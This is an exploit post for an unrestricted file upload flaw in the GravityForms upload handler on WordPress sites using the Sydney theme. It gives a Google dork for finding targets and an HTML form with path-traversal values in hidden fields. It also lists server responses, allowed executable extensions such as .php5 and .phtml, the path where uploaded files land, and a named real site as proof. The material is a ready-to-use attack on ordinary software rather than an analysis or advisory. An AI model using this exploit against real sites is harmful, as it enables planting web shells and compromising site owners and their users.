facebook facebook twitter rss

WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability

Author: KingSkrupellos , Published: 09-10-2018

# Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]

#################################################################################################

# Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.''

# Exploit HTML Code :

<title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title>

<form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data">

<body background=" ">

<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type=hidden">
<input name="name" value="kingskrupellos.html" type=''hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">

</form>

[img]http://www.imageupload.co.uk/images/2018/06/08/gravityphp5athemes.png[/img]

Exploit : TARGET/?gf_page=upload

We cannot upload directly with this exploit. But we can upload our file to the site with remote file exploiter.

# Error : {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}

[img]http://www.imageupload.co.uk/images/2018/06/08/miplantest1.png[/img]

# Error [ Successful ] : {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}

[img]http://www.imageupload.co.uk/images/2018/06/08/miplantest2.png[/img]

# Allowed File Extensions : .html .htm .php5 .txt .jpg .gif .png .html.fla .phtml .pdf

# You don't need to change your filename as _input__kingskrupellos.php5 like this.

# Just choose a file from your machine and upload it with the beforementioned extensions.

# For example : yourfilename.php file will upload to the server [ site ] like this. /_input__kingskrupellos.php5

# Example Usage for Windows :

# Use with XAMPP Control Panel and your Localhost.
# Use from htdocs folder located in XAMPP

# 127.0.0.1/athemeswordpressexploiter.html

# Path : TARGET/_input__kingskrupellos.php5

[img]http://www.imageupload.co.uk/images/2018/06/08/Screenshot_1.png[/img]

#################################################################################################

# Example Site => miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ]

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :